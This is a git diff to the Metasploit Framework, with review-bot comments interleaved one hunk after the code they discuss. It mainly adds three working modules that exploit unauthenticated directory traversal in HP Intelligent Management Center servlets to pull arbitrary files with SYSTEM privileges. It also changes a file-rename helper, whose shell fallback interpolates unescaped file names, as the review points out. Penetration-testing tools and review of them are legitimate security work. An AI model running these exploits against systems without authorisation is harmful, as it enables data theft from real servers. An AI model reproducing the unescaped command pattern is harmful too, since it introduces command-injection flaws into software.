diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb
index 47a0677c1c..1ed5dd6b34 100644
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -299,13 +299,18 @@ module Msf::Post::File
 end
 #
- # Rename a remote file. This is a stopgap until a proper API version is added:
- # http://dev.metasploit.com/redmine/issues/7288
+ # Rename a remote file.
 #
- def rename_file(new_file, old_file)
- #TODO: this is not ideal as the file contents are sent to meterp server and back to the client
- write_file(new_file, read_file(old_file))
- rm_f(old_file)
+ def rename_file(old_file, new_file)
+ if session.respond_to? :commands and session.commands.include?("stdapi_fs_file_move")
+ session.fs.file.mv(old_file, new_file)
+ else
+ if session.platform =~ /win/
+ cmd_exec(%Q|move /y "#{old_file}" "#{new_file}"|)
+ else
+ cmd_exec(%Q|mv -f "#{old_file}" "#{new_file}"|)
+ end
+ end
 end
 alias :move_file :rename_file
 alias :mv_file :rename_file
diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
new file mode 100644
index 0000000000..21f5443227
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
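Review bot: The shell fallback in `rename_file` interpolates `old_file` and `new_file` unescaped into a double-quoted command string, so a name containing `"`, or `$`/backtick (which a POSIX shell expands even inside double quotes), is parsed by the remote shell as command syntax rather than as the file name, and names that originate on the remote file system are not under the caller's control; the `mv -f` branch should pass `#{old_file.shellescape}` and `#{new_file.shellescape}` (with `require 'shellwords'` if the file does not already load it), and the Windows branch should refuse a name containing `"`, since `cmd.exe` has no general escape for it. The parameter order also flips from `(new_file, old_file)` to `(old_file, new_file)` and the `move_file`/`mv_file` aliases follow; any caller elsewhere in the tree still using the old order would now move its destination over its source, so those call sites need checking (none are in this diff). `session.respond_to? :commands and ...` mixes the low-precedence `and` with a paren-less call; `session.respond_to?(:commands) && session.commands.include?("stdapi_fs_file_move")` is the safer spelling. The enclosing module continues outside the hunk.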
@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Intelligent Management FaultDownloadServlet Directory Traversal',
+ 'Description' => %q{
+ This module exploits a lack of authentication and a directory traversal in HP
+ Intelligent Management, specifically in the FaultDownloadServlet, in order to
+ retrieve arbitrary files with SYSTEM privileges. This module has been tested
+ successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5202' ],
+ [ 'OSVDB', '91027' ],
+ [ 'BID', '58675' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-051/' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+ OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+ # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+ OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+ ], self.class)
+ end
+
+ def is_imc?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
+ 'method' => 'GET'
+ })
+
+ if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+ return true
+ else
+ return false
+ end
+ end
+
+ def my_basename(filename)
+ return ::File.basename(filename.gsub(/\\/, "/"))
+ end
+
+ def run_host(ip)
+
+ if not is_imc?
+ vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+ return
+ end
+
+ travs = ""
+ travs << "../" * datastore['DEPTH']
+ travs << datastore['FILEPATH']
+
+ vprint_status("#{rhost}:#{rport} - Sending request...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"),
+ 'method' => 'GET',
+ 'vars_get' =>
+ {
+ 'fileName' => travs
+ }
+ })
+
+ if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+ contents = res.body
+ fname = my_basename(datastore['FILEPATH'])
+ path = store_loot(
+ 'hp.imc.faultdownloadservlet',
+ 'application/octet-stream',
+ ip,
+ contents,
+ fname
+ )
+ print_good("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
new file mode 100644
index 0000000000..1e308b45d4
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
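Review bot: `is_imc?` spells out `if ... return true else return false end` around a condition that already yields a truthy/falsy value; `!!(res && res.code == 200 && res.body =~ /HP Intelligent Management Center/)` says the same in one line, and the keyword operators used here and in `run_host` (`if not is_imc?`, `if res and ...`) bind more loosely than `&&`/`!` and are the usual source of precedence surprises, so `&&`, `!` and `unless` are preferable. The response check `res.headers['Content-Type'] == "application/doc"` is an exact match that a header carrying a parameter such as `; charset=...` would fail, so `res.headers['Content-Type'].start_with?("application/doc")` would be more robust. The same points apply verbatim to the IctDownloadServlet and ReportImgServlt modules added later in this diff, which are near-identical copies of this file; the shared `is_imc?`, `my_basename` and download-and-store logic would be better extracted into one mixin so a fix lands in one place.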
@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal',
+ 'Description' => %q{
+ This module exploits a lack of authentication and a directory traversal in HP
+ Intelligent Management, specifically in the IctDownloadServlet, in order to
+ retrieve arbitrary files with SYSTEM privileges. This module has been tested
+ successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5204' ],
+ [ 'OSVDB', '91029' ],
+ [ 'BID', '58676' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+ OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+ # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+ OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+ ], self.class)
+ end
+
+ def is_imc?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
+ 'method' => 'GET'
+ })
+
+ if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+ return true
+ else
+ return false
+ end
+ end
+
+ def my_basename(filename)
+ return ::File.basename(filename.gsub(/\\/, "/"))
+ end
+
+ def run_host(ip)
+
+ if not is_imc?
+ vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+ return
+ end
+
+ travs = ""
+ travs << "../" * datastore['DEPTH']
+ travs << datastore['FILEPATH']
+
+ vprint_status("#{rhost}:#{rport} - Sending request...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
+ 'method' => 'GET',
+ 'vars_get' =>
+ {
+ 'fileName' => travs
+ }
+ })
+
+ if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+ contents = res.body
+ fname = my_basename(datastore['FILEPATH'])
+ path = store_loot(
+ 'hp.imc.faultdownloadservlet',
+ 'application/octet-stream',
+ ip,
+ contents,
+ fname
+ )
+ print_good("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb
new file mode 100644
index 0000000000..bfe035cb38
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb
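Review bot: The `store_loot` call in `run_host` labels the saved file `'hp.imc.faultdownloadservlet'`, copied from the FaultDownloadServlet module, although this module retrieves it through the IctDownloadServlet; it should read `'hp.imc.ictdownloadservlet'` so loot records identify which servlet produced them. The ReportImgServlt module later in this diff carries the same copy-pasted label and needs its own name as well.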
@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Intelligent Management ReportImgServlt Directory Traversal',
+ 'Description' => %q{
+ This module exploits a lack of authentication and a directory traversal in HP
+ Intelligent Management, specifically in the ReportImgServlt, in order to retrieve
+ arbitrary files with SYSTEM privileges. This module has been tested successfully on
+ HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5203' ],
+ [ 'OSVDB', '91028' ],
+ [ 'BID', '58672' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-052/' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+ OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+ # By default files downloaded from C:\Program Files\iMC\client\bin\
+ OptInt.new('DEPTH', [true, 'Traversal depth', 4])
+ ], self.class)
+ end
+
+ def is_imc?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
+ 'method' => 'GET'
+ })
+
+ if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+ return true
+ else
+ return false
+ end
+ end
+
+ def my_basename(filename)
+ return ::File.basename(filename.gsub(/\\/, "/"))
+ end
+
+ def run_host(ip)
+
+ if not is_imc?
+ vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+ return
+ end
+
+ travs = ""
+ travs << "../" * datastore['DEPTH']
+ travs << datastore['FILEPATH']
+
+ vprint_status("#{rhost}:#{rport} - Sending request...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "reportImg"),
+ 'method' => 'GET',
+ 'vars_get' =>
+ {
+ 'path' => travs
+ }
+ })
+
+ if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "image/png"
+ contents = res.body
+ fname = my_basename(datastore['FILEPATH'])
+ path = store_loot(
+ 'hp.imc.faultdownloadservlet',
+ 'application/octet-stream',
+ ip,
+ contents,
+ fname
+ )
+ print_good("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb
index 924cf91a4c..ea301d86be 100644
--- a/test/modules/post/test/file.rb
+++ b/test/modules/post/test/file.rb
@@ -13,11 +13,10 @@ class Metasploit4 < Msf::Post
 def initialize(info={})
 super( update_info( info,
- 'Name' => 'Testing remote file manipulation',
+ 'Name' => 'Testing Remote File Manipulation',
 'Description' => %q{ This module will test Post::File API methods },
 'License' => MSF_LICENSE,
 'Author' => [ 'egypt'],
- 'Version' => '$Revision$',
 'Platform' => [ 'windows', 'linux', 'java' ],
 'SessionTypes' => [ 'meterpreter', 'shell' ]
 ))
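Review bot: `my_basename` carries no comment explaining the `gsub(/\\/, "/")` before `::File.basename`; the intent is presumably that `FILEPATH` may be given as a Windows path while `File.basename` on a POSIX-hosted framework only recognises `/` as a separator, so a one-line `# FILEPATH may use Windows separators; File.basename on a POSIX host only splits on "/"` above the method would spare the next reader the inference. The same helper appears verbatim in the FaultDownloadServlet and IctDownloadServlet modules earlier in this diff and would take the same comment. The `DEPTH` option's inline comment `# By default files downloaded from C:\Program Files\iMC\client\bin\` explains the default of 4 only indirectly; adding that the default equals the number of path components between that folder and the drive root (which the four components in that path appear to match) would make the relation explicit.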
@@ -102,6 +101,23 @@ class Metasploit4 < Msf::Post
 not file_exist?("pwned")
 end
+ it "should move files" do
+ # Make sure we don't have leftovers from a previous run
+ file_rm("meterpreter-test") rescue nil
+ file_rm("meterpreter-test-moved") rescue nil
+
+ # touch a new file
+ write_file("meterpreter-test", "")
+
+ rename_file("meterpreter-test", "meterpreter-test-moved")
+ res &&= exist?("meterpreter-test-moved")
+ res &&= !exist?("meterpreter-test")
+
+ # clean up
+ file_rm("meterpreter-test") rescue nil
+ file_rm("meterpreter-test-moved") rescue nil
+ end
+
 end
 def test_binary_files
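Review bot: In the new `it "should move files"` block `res` is never initialised, so both `res &&= exist?(...)` lines leave it `nil`, and the block's last expression is the cleanup `file_rm("meterpreter-test-moved") rescue nil`, so the value the spec yields is the cleanup's return rather than the rename outcome; add `res = true` before the first `file_rm` and close the block with `res` after the cleanup. That the block's value is the verdict is inferred from the preceding spec, whose last line `not file_exist?("pwned")` is visible as context; the `it` implementation itself is outside this hunk. The block also checks with `exist?` while that context line uses `file_exist?`; unless `exist?` is an alias in Post::File (not visible here), the spec raises on the name before any assertion runs.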